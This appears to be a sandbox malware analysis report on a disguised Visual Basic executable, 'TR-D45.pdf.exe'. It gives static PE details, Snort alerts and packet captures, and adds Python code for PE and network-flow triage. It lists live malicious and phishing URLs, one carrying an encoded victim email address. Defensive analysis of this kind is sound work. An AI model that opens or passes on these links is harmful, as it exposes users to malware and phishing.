                                                           • 192.185.152.65
                                                         https://bit.ly/2UDM1To (malicious)
                                                           • 192.185.152.65
                                                         https://app.clio.com/link/AxWtfjmmzhja (malicious)
                                                           • 192.185.152.65
                                                         order.exe (malicious)
                                                           • 192.185.152.65
                                                         http://45.95.168.116 (malicious)
                                                           • 192.185.152.65
                                                         https://u7342898.ct.sendgrid.net/ls/click?upn=HCSIWZDf9Xl-2FB6XFKqg1zjEMCja-2BnYJ5hRYKkDjy2dSVqjHsLlv5ZMXJXnh9JLSzwabeBrvYMnX699odsYkKotv4jgW-2BTippSHf276Hpn3fz0kcusnYHGKND7vKQPAS7g42-2FTb5zb8CNq57r3z9Ilg-3D-3DWdrE_hNl5WjNXy0NQcJb9WqI7qh7uPLeU7UGDRahFCFKbQLS6qwym7zJ-2B-2BhWsSSLs8pHa1w9VDlWPsA7ahHsZZucjX2ktFkSy5vhVZT2L3Jxh6b-2FoboCHa2CJGLfF19s71-2FI3WPC7rECe-2BEO9fLwbfggsNq2V1-2FqgMhzgJQL411ZuD7Y8pECisPKLf0vf9WvB1fyVO9o6Euui31Jg3e-2FDialpg2CbkM21Us8J-2FBk13yWzh58-3D (malicious)
                                                           • 192.185.152.65
                                                         https://carolearmstrongrealestate.com/wpe/14ea332d0684051d9fef033a5f1607dd?usr=cnBlbmRsZXRvbkBkYXRlc3dlaXNlci5jb20= (malicious)
                                                           • 192.185.152.65
                                                         dde1df2ac5845a19823cabe182fcd870.exe (malicious)
                                                           • 192.185.152.65
                                                         https://prod.dfg152.ru/activate?key=23696252760045174930 (malicious)
                                                           • 192.185.152.65
                                                         dde1df2ac5845a19823cabe182fcd870.exe (malicious)
                                                           • 192.185.152.65
                                                         BYRkah8GsZ.exe (malicious)
                                                           • 192.185.152.65
                                                         https://www.canva.com/design/DAEN3YdYVHw/zaVHWoDx-9G9l20JXWSBtg/view?utm_content=DAEN3YdYVHw&utm_campaign=designshare&utm_medium=link&utm_source=sharebutton (malicious)
                                                           • 192.185.152.65
                                                         splwow64.exe (malicious)
                                                           • 192.185.152.65
                                                         NyUnwsFSCa.exe (malicious)
                                                           • 192.185.152.65
                                                         https://signup.kwikvpn.com/ (malicious)
                                                           • 192.185.152.65
                                                         AWB# 9284730932.exe (malicious)
                                                           • 192.185.152.65

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      No created / dropped files found

                                                      Static File Info

                                                      General

                                                       File type: PE32 executable (GUI) Intel 80386, for MS Windows
                                                       Entropy (8bit): 4.753776785310815
                                                       TrID:
                                                       • Win32 Executable (generic) a (10002005/4) 99.15%
                                                       • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                       • Generic Win/DOS Executable (2004/3) 0.02%
                                                       • DOS Executable Generic (2002/1) 0.02%
                                                       • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                       File name: TR-D45.pdf.exe
                                                       File size: 86016
                                                       MD5: 937841064411662c36469498ea645660
                                                       SHA1: 7e72225620b06b6d9f5d54ee45ca2dd7ba10e87e
                                                       SHA256: 3b162f2943b2ee8d6075b2f8f4cbd7832e11b50ecdfcb4a68cf18eb1c7614651
                                                       SHA512: 5b5b035ab1829b2aaabce570767de93f77d07d291cf32df2d899b21b68bec3c66b77fc758f18b730161ddd7b22cf0b07c4efaeaa8d1917eae8073a6e52e7eac2
                                                       SSDEEP: 768:dM21YSCVEWuYk96U1N+2gC3UGHNbdfJ+fQ2uepQc5408zZkOcG:hYSwuYk22gdyN2bueypaOZ
                                                       File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......_.....................@......`........ ....@................

                                                      File Icon

                                                       Icon Hash: 00d6d4ec71b24430

                                                      Static PE Info

                                                      General

                                                       Entrypoint: 0x401360
                                                       Entrypoint Section: .text
                                                       Digitally signed: false
                                                       Imagebase: 0x400000
                                                       Subsystem: windows gui
                                                       Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                       DLL Characteristics: (none)
                                                       Time Stamp: 0x5FB6BE0B [Thu Nov 19 18:48:43 2020 UTC]
                                                       TLS Callbacks: (none)
                                                       CLR (.Net) Version: (none)
                                                       OS Version Major: 4
                                                       OS Version Minor: 0
                                                       File Version Major: 4
                                                       File Version Minor: 0
                                                       Subsystem Version Major: 4
                                                       Subsystem Version Minor: 0
                                                       Import Hash: 0cb4f4ece3f5875b40d2bf4babdf78ef
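The header fields listed above (entry point, image base, subsystem, characteristics, link timestamp, and the import data directory that the Data Directories table maps to .text) can all be read straight out of the COFF and PE32 optional headers. The following is an added example, not part of the Joe Sandbox report and not code from the sample: it decodes those fields with only the Python standard library, maps an RVA back to its section and file offset, and checks whether the entry point starts with the `push imm32; call rel32` stub that Visual Basic 6 executables use to hand control to the runtime (the Entrypoint Preview shows exactly such a `push 004039FCh` followed by a `call`). The PE image it parses is constructed inline from the values in this report (entry 0x401360, base 0x400000, timestamp 0x5FB6BE0B, characteristics 0x010F, import directory RVA 0x115b4 size 0x28, a single .text section); the section layout and the push target are assumptions for the demonstration, not facts about TR-D45.pdf.exe.

```python
import struct
from datetime import datetime, timezone

# Flag bits and directory order from the PE/COFF specification.
CHARACTERISTICS = {0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE",
                   0x0004: "LINE_NUMS_STRIPPED", 0x0008: "LOCAL_SYMS_STRIPPED",
                   0x0020: "LARGE_ADDRESS_AWARE", 0x0100: "32BIT_MACHINE",
                   0x2000: "DLL"}
DLL_CHARACTERISTICS = {0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
                       0x0100: "NX_COMPAT", 0x0400: "NO_SEH", 0x4000: "GUARD_CF"}
SUBSYSTEMS = {1: "native", 2: "windows gui", 3: "windows cui"}
DIRECTORIES = ["EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC",
               "DEBUG", "ARCHITECTURE", "GLOBALPTR", "TLS", "LOAD_CONFIG",
               "BOUND_IMPORT", "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED"]


def parse_pe32(data: bytes) -> dict:
    """Decode COFF header, PE32 optional header, data directories and the
    section table with the standard library only (no pefile dependency)."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _machine, nsect, tstamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (magic 0x10b) is handled here")
    ep_rva, = struct.unpack_from("<I", data, opt + 16)
    image_base, = struct.unpack_from("<I", data, opt + 28)
    ss_major, ss_minor = struct.unpack_from("<HH", data, opt + 48)
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    ndirs, = struct.unpack_from("<I", data, opt + 92)
    dirs = {}
    for i in range(min(ndirs, 16)):
        rva, size = struct.unpack_from("<II", data, opt + 96 + 8 * i)
        if rva or size:                      # skip empty directory slots
            dirs[DIRECTORIES[i]] = (rva, size)
    sections = []
    for i in range(nsect):                   # section headers follow the optional header
        name, vsize, va, rawsize, rawptr = struct.unpack_from(
            "<8sIIII", data, opt + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0").decode(), va, vsize, rawptr, rawsize))
    return {
        "timestamp": datetime.fromtimestamp(tstamp, tz=timezone.utc),
        "characteristics": sorted(n for b, n in CHARACTERISTICS.items() if chars & b),
        "dll_characteristics": sorted(n for b, n in DLL_CHARACTERISTICS.items() if dll_chars & b),
        "entrypoint_rva": ep_rva,
        "entrypoint": image_base + ep_rva,   # VA, as the report prints it
        "subsystem": SUBSYSTEMS.get(subsystem, hex(subsystem)),
        "subsystem_version": (ss_major, ss_minor),
        "directories": dirs,
        "sections": sections,
    }


def locate_rva(info: dict, rva: int):
    """Map an RVA to (section name, file offset); None if no section backs it."""
    for name, va, vsize, rawptr, rawsize in info["sections"]:
        if va <= rva < va + max(vsize, rawsize):
            return name, rawptr + (rva - va)
    return None


def vb6_entry_stub(data: bytes, info: dict):
    """VB6 executables begin with `push offset VBHeader; call ThunRTMain`
    (68 imm32 E8 rel32). Return the pushed VA when that stub is present."""
    hit = locate_rva(info, info["entrypoint_rva"])
    if hit and data[hit[1]] == 0x68 and data[hit[1] + 5] == 0xE8:
        return struct.unpack_from("<I", data, hit[1] + 1)[0]
    return None


def build_sample_image() -> bytes:
    """CONSTRUCTED image reproducing the header values in the report
    (entry 0x401360, base 0x400000, stamp 0x5FB6BE0B, chars 0x010F,
    import directory at RVA 0x115b4 size 0x28). It is not the sample."""
    e_lfanew, text_raw = 0x80, 0x400
    dos = (b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0x5FB6BE0B, 0, 0, 224, 0x010F)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                      # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1360)                    # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                  # ImageBase
    struct.pack_into("<6H", opt, 40, 4, 0, 4, 0, 4, 0)         # OS/image/subsystem versions 4.0
    struct.pack_into("<HH", opt, 68, 2, 0)                     # GUI subsystem, no DllCharacteristics
    struct.pack_into("<I", opt, 92, 16)                        # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * 1, 0x115B4, 0x28)    # IMPORT directory
    sect = struct.pack("<8sIIIIIIHHI", b".text", 0x11000, 0x1000, 0x11000,
                       text_raw, 0, 0, 0, 0, 0x60000020)       # one section: RVA 0x1000, raw at 0x400
    header = (dos + b"PE\0\0" + coff + bytes(opt) + sect).ljust(text_raw, b"\0")
    body = bytearray(0x11000)
    struct.pack_into("<BIBi", body, 0x360, 0x68, 0x4039FC, 0xE8, 0)  # push/call stub at RVA 0x1360
    return header + bytes(body)
```

Run `parse_pe32(open(path, "rb").read())` on a real 32-bit binary to get the same dictionary; an empty `dll_characteristics` list, as here, means the image opted into neither ASLR (DYNAMIC_BASE) nor DEP (NX_COMPAT), which is typical of VB6 builds and worth noting in triage. `locate_rva` is what answers the "Is in Section" column of the Data Directories table, and `vb6_entry_stub` is a cheap corroboration of the TrID "Visual Basic 6" verdict before any dynamic analysis.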

                                                      Entrypoint Preview

                                                      Instruction
                                                      push 004039FCh
                                                      call 00007FF010A07145h
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      xor byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      inc eax
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add bl, ch
                                                      inc ebp
                                                      fdivrp st(2), st(0)
                                                      mov bh, CCh
                                                      mov ecx, 0FD68147h
                                                      sub al, 94h
                                                      insd
                                                      leave
                                                      lahf
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add dword ptr [eax], eax
                                                      add byte ptr [eax], al
                                                      and byte ptr [eax], ah
                                                      and byte ptr [eax], ah
                                                      and byte ptr [eax], ah
                                                      imul ebp, dword ptr [esi+66h], 6978656Ch
                                                      outsd
                                                      outsb
                                                      popad
                                                      insb
                                                      add byte ptr [esi+75h], ah
                                                      insb
                                                      outsb
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      dec esp
                                                      xor dword ptr [eax], eax
                                                      add dword ptr [eax+72BB315Ah], esp
                                                      int 73h
                                                      dec esp
                                                      mov ah, DEh
                                                      cli
                                                      and dword ptr [ebx+56B47994h], 03h
                                                      dec ecx
                                                      push esp
                                                      enter 4848h, A1h
                                                      mov al, 2Bh
                                                      xchg dword ptr [edi+3AD0135Dh], edi
                                                      dec edi
                                                      lodsd
                                                      xor ebx, dword ptr [ecx-48EE309Ah]
                                                      or al, 00h
                                                      stosb
                                                      add byte ptr [eax-2Dh], ah
                                                      xchg eax, ebx
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      dec eax
                                                      and eax, 25100000h
                                                      add byte ptr [eax], al
                                                      add byte ptr [6F635300h], cl
                                                      jc 00007FF010A071C0h
                                                      jne 000071BFh
                                                      outsb
                                                      jnc 00007FF010A071C6h
                                                      cmp byte ptr [eax], al
                                                      or eax, 55001101h

                                                      Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x115b4 | 0x28 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x14000 | 0x15d8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x228 | 0x20 | (header area, below the first section at 0x1000)
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0xe4 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                      Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x109c4 | 0x11000 | False | 0.357579848346 | data | 5.29889463041 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data | 0x12000 | 0x118c | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x14000 | 0x15d8 | 0x2000 | False | 0.138427734375 | data | 1.78813993068 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                      Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x153f0 | 0x1e8 | data | |
RT_ICON | 0x14d28 | 0x6c8 | data | |
RT_ICON | 0x143a0 | 0x988 | data | |
RT_GROUP_ICON | 0x14370 | 0x30 | data | |
RT_VERSION | 0x14150 | 0x220 | data | Greek | Greece

                                                      Imports

DLL | Import
MSVBVM60.DLL | _CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaCastObjVar, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaVarDup, __vbaVarLateMemCallLd, __vbaFpI4, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                                                      Version Infos

Description | Data
Translation | 0x0408 0x04b0
InternalName | SBEKASSEBILER
FileVersion | 2.00
CompanyName | Gallup
ProductName | Gallup
ProductVersion | 2.00
OriginalFilename | SBEKASSEBILER.exe

                                                      Possible Origin

Language of compilation system | Country where language is spoken
Greek | Greece
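The static fields in the tables above (per-section entropy, the data directory to section mapping, the section characteristics flags, the 0x0408 translation ID behind the "Greek" origin guess, and the double-extension file name) can all be reproduced from the PE headers with the standard library alone. The following is an added example, not part of this report or of the sandbox's own tooling: it parses a PE32 header with `struct`, computes the same Shannon entropy the Entropy column shows, resolves each data directory to the section that covers its RVA, and runs a few cheap triage checks. It runs on a minimal PE image constructed inline, not on the analysed sample. The lure-extension list, the partial language table and the 7.0 entropy threshold are assumptions for the demo.

```python
import math
import struct
from collections import Counter

# Data-directory names in on-disk order (IMAGE_DIRECTORY_ENTRY_*), as the report lists them.
DIRECTORY_NAMES = ["EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC",
                   "DEBUG", "COPYRIGHT", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT",
                   "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED"]
# Section characteristics bits that the report's Characteristics column prints.
SECTION_FLAGS = {0x20: "IMAGE_SCN_CNT_CODE", 0x40: "IMAGE_SCN_CNT_INITIALIZED_DATA",
                 0x80: "IMAGE_SCN_CNT_UNINITIALIZED_DATA", 0x20000000: "IMAGE_SCN_MEM_EXECUTE",
                 0x40000000: "IMAGE_SCN_MEM_READ", 0x80000000: "IMAGE_SCN_MEM_WRITE"}
# Partial table (assumption) of primary language IDs: the low 10 bits of a VS_VERSION_INFO LANGID.
PRIMARY_LANG = {0x08: "Greek", 0x09: "English"}
# Document-style extensions that commonly precede a disguised ".exe" (assumed list).
LURE_EXTENSIONS = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg"}


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte, the measure behind the report's Entropy column."""
    if not data:
        return 0.0
    n = len(data)
    return sum(-(c / n) * math.log2(c / n) for c in Counter(data).values())


def decode_characteristics(chars: int) -> list:
    return [name for bit, name in SECTION_FLAGS.items() if chars & bit]


def decode_translation(lang_id: int) -> str:
    """0x0408 -> Greek: the primary language is the low 10 bits of the LANGID."""
    return PRIMARY_LANG.get(lang_id & 0x3FF, "unknown(0x%03x)" % (lang_id & 0x3FF))


def section_for_rva(sections: list, rva: int):
    """Name of the section whose virtual range covers rva; None if it lies in the headers."""
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["raw_size"]):
            return s["name"]
    return None


def parse_pe(blob: bytes) -> dict:
    """Parse a PE32 header: section table with entropy, and data directories resolved to sections."""
    if blob[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    file_hdr = e_lfanew + 4
    _machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", blob, file_hdr)
    opt = file_hdr + 20
    if struct.unpack_from("<H", blob, opt)[0] != 0x10B:
        raise ValueError("only PE32 (magic 0x10b) optional headers are handled here")
    sections = []
    for i in range(nsections):                      # section table follows the optional header
        off = opt + opt_size + 40 * i
        name = blob[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", blob, off + 8)
        chars = struct.unpack_from("<I", blob, off + 36)[0]
        sections.append({"name": name, "va": va, "vsize": vsize, "raw_size": raw_size, "chars": chars,
                         "entropy": shannon_entropy(blob[raw_ptr:raw_ptr + raw_size])})
    n_dirs = min(struct.unpack_from("<I", blob, opt + 92)[0], 16)   # NumberOfRvaAndSizes
    directories = []
    for i in range(n_dirs):                         # directory entries start at optional header + 96
        rva, size = struct.unpack_from("<II", blob, opt + 96 + 8 * i)
        directories.append((DIRECTORY_NAMES[i], rva, size, section_for_rva(sections, rva) if size else None))
    return {"sections": sections, "directories": directories}


def triage(filename: str, pe: dict) -> list:
    """Cheap static flags: double extension, writable+executable sections, packed-looking sections."""
    flags = []
    parts = filename.lower().split(".")
    if len(parts) >= 3 and parts[-1] == "exe" and parts[-2] in LURE_EXTENSIONS:
        flags.append("double extension .%s.exe" % parts[-2])
    for s in pe["sections"]:
        if s["chars"] & 0x20000000 and s["chars"] & 0x80000000:
            flags.append("section %s is writable and executable" % s["name"])
        if s["entropy"] > 7.0:
            flags.append("high-entropy section %s (%.2f)" % (s["name"], s["entropy"]))
    return flags


def build_test_pe() -> bytes:
    """Constructed minimal PE32 image for the demo (not the analysed sample): a .text section of
    NOPs (entropy 0), a .data section holding every byte value twice (entropy 8), an IMPORT
    directory inside .text and a BOUND_IMPORT directory inside the headers."""
    def section(name, va, raw_ptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, 0x200, va, 0x200, raw_ptr, 0, 0, 0, 0, chars)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 224, 0x0102)
    dirs = [(0, 0)] * 16
    dirs[1], dirs[11] = (0x1010, 0x28), (0x140, 0x20)
    opt = struct.pack("<H", 0x10B) + b"\0" * 90 + struct.pack("<I", 16)
    opt += b"".join(struct.pack("<II", rva, size) for rva, size in dirs)
    headers = (dos + b"PE\0\0" + file_hdr + opt
               + section(b".text", 0x1000, 0x200, 0x60000020) + section(b".data", 0x2000, 0x400, 0xC0000040))
    return headers.ljust(0x200, b"\0") + b"\x90" * 0x200 + bytes(range(256)) * 2


if __name__ == "__main__":
    pe = parse_pe(build_test_pe())
    for s in pe["sections"]:
        print("%-6s va=0x%x entropy=%.2f %s" % (s["name"], s["va"], s["entropy"],
                                                ", ".join(decode_characteristics(s["chars"]))))
    for name, rva, size, sec in pe["directories"]:
        print("IMAGE_DIRECTORY_ENTRY_%-15s 0x%-6x 0x%-4x %s" % (name, rva, size, sec or ""))
    print(decode_translation(0x0408), triage("TR-D45.pdf.exe", pe))
```

To apply it to a real file, replace `build_test_pe()` with `open(path, "rb").read()`; the entropy and directory columns should then match the report's tables for any PE32 image, and the BOUND_IMPORT row resolves to no section exactly as it does above, because RVA 0x228 sits in the header area.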

                                                      Network Behavior

                                                      Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
11/20/20-09:05:53.419410 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49743 | 34.102.136.180 | 192.168.2.5
11/20/20-09:06:40.687797 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | - | - | 192.168.2.5 | 8.8.8.8
11/20/20-09:06:41.688704 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | - | - | 192.168.2.5 | 8.8.8.8
11/20/20-09:06:43.702857 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | - | - | 192.168.2.5 | 8.8.8.8
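The TCP Packets list that follows is one row per segment, which is the wrong granularity for triage; what a responder wants is one record per connection, with the Snort alerts attached to the connection they fired on. The following is an added example, not part of this report or of the sandbox's tooling. The packet and alert rows embedded in it are a constructed subset copied from this page's tables (the sandbox IP 192.168.2.5 is taken from those rows); the port-to-service labels are an assumption. It also shows the gap a practitioner should notice here: the 403 alert belongs to client port 49743, a connection that is not among the sampled packet rows, so the correlation reports it as unseen rather than silently dropping it.

```python
from datetime import datetime

# Constructed sample input: rows copied from the report's TCP Packets table
# (timestamp, source port, destination port, source IP, destination IP).
PACKETS = [
    ("Nov 20, 2020 09:04:53.014657974 CET", 49718, 443, "192.168.2.5", "192.185.152.65"),
    ("Nov 20, 2020 09:04:53.148817062 CET", 443, 49718, "192.185.152.65", "192.168.2.5"),
    ("Nov 20, 2020 09:04:53.148917913 CET", 49718, 443, "192.168.2.5", "192.185.152.65"),
    ("Nov 20, 2020 09:04:53.183671951 CET", 49718, 443, "192.168.2.5", "192.185.152.65"),
    ("Nov 20, 2020 09:04:54.246615887 CET", 443, 49718, "192.185.152.65", "192.168.2.5"),
]
# Constructed sample input: the report's Snort rows
# (timestamp, protocol, SID, message, source port, destination port, source IP, destination IP).
ALERTS = [
    ("11/20/20-09:05:53.419410", "TCP", 1201, "ATTACK-RESPONSES 403 Forbidden",
     80, 49743, "34.102.136.180", "192.168.2.5"),
    ("11/20/20-09:06:40.687797", "ICMP", 402, "ICMP Destination Unreachable Port Unreachable",
     None, None, "192.168.2.5", "8.8.8.8"),
]
SANDBOX_IP = "192.168.2.5"                       # the analysis VM, taken from the report's rows
WELL_KNOWN = {80: "HTTP", 443: "HTTPS", 53: "DNS"}  # assumed labels for the remote port


def parse_packet_time(stamp: str) -> datetime:
    """'Nov 20, 2020 09:04:53.014657974 CET' -> naive datetime. Nanoseconds are truncated to
    microseconds because strptime's %f takes at most six digits; the zone suffix is dropped
    because every row shares the sandbox clock and only differences are used."""
    text, _zone = stamp.rsplit(" ", 1)
    head, frac = text.split(".")
    return datetime.strptime("%s.%s" % (head, frac[:6]), "%b %d, %Y %H:%M:%S.%f")


def parse_alert_time(stamp: str) -> datetime:
    """Snort's '11/20/20-09:05:53.419410' -> naive datetime on the same clock."""
    return datetime.strptime(stamp, "%m/%d/%y-%H:%M:%S.%f")


def flow_key(sport, dport, src, dst, local_ip=SANDBOX_IP):
    """Normalise a packet to (local_ip, local_port, remote_ip, remote_port) plus its direction,
    so both halves of a connection land on the same key."""
    if src == local_ip:
        return (src, sport, dst, dport), "out"
    return (dst, dport, src, sport), "in"


def summarize_flows(packets, local_ip=SANDBOX_IP) -> dict:
    """Collapse the packet list into per-connection records: packets per direction,
    first/last timestamp, duration in seconds and a label for the remote port."""
    flows = {}
    for stamp, sport, dport, src, dst in packets:
        key, direction = flow_key(sport, dport, src, dst, local_ip)
        t = parse_packet_time(stamp)
        f = flows.setdefault(key, {"out": 0, "in": 0, "first": t, "last": t,
                                   "service": WELL_KNOWN.get(key[3], "tcp/%d" % key[3])})
        f[direction] += 1
        f["first"], f["last"] = min(f["first"], t), max(f["last"], t)
    for f in flows.values():
        f["duration"] = (f["last"] - f["first"]).total_seconds()
    return flows


def correlate_alerts(flows, alerts, local_ip=SANDBOX_IP) -> list:
    """Attach each TCP Snort alert to its connection. Returns (time, sid, message, key, seen);
    seen is False when the alert's connection has no packets in the list, which is the case
    for the 403 on port 49743 in the sampled rows. ICMP alerts carry no ports and are skipped."""
    out = []
    for stamp, proto, sid, msg, sport, dport, src, dst in alerts:
        if proto != "TCP":
            continue
        key, _ = flow_key(sport, dport, src, dst, local_ip)
        out.append((parse_alert_time(stamp), sid, msg, key, key in flows))
    return out


if __name__ == "__main__":
    flows = summarize_flows(PACKETS)
    for (lip, lport, rip, rport), f in flows.items():
        print("%s:%d -> %s:%d (%s) out=%d in=%d %.3fs"
              % (lip, lport, rip, rport, f["service"], f["out"], f["in"], f["duration"]))
    for when, sid, msg, key, seen in correlate_alerts(flows, ALERTS):
        print("%s SID %d %s on %s:%d -> %s:%d, packets in list: %s"
              % (when.isoformat(), sid, msg, key[0], key[1], key[2], key[3], seen))
```

Feed it the full packet table rather than the five sampled rows and the HTTPS flow to 192.185.152.65 comes out as a single record with its true packet counts; any alert whose `seen` stays False then points at a connection the packet list does not cover, which is worth checking against the pcap rather than assuming the export is complete.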

                                                      Network Port Distribution

                                                      TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 20, 2020 09:04:53.014657974 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:53.148817062 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:53.148917913 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:53.183671951 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:53.317677021 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:53.319329023 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:53.319369078 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:53.319391966 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:53.319427013 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:53.319459915 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:53.540272951 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:53.675340891 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:53.675415039 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:53.702871084 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:53.841784000 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
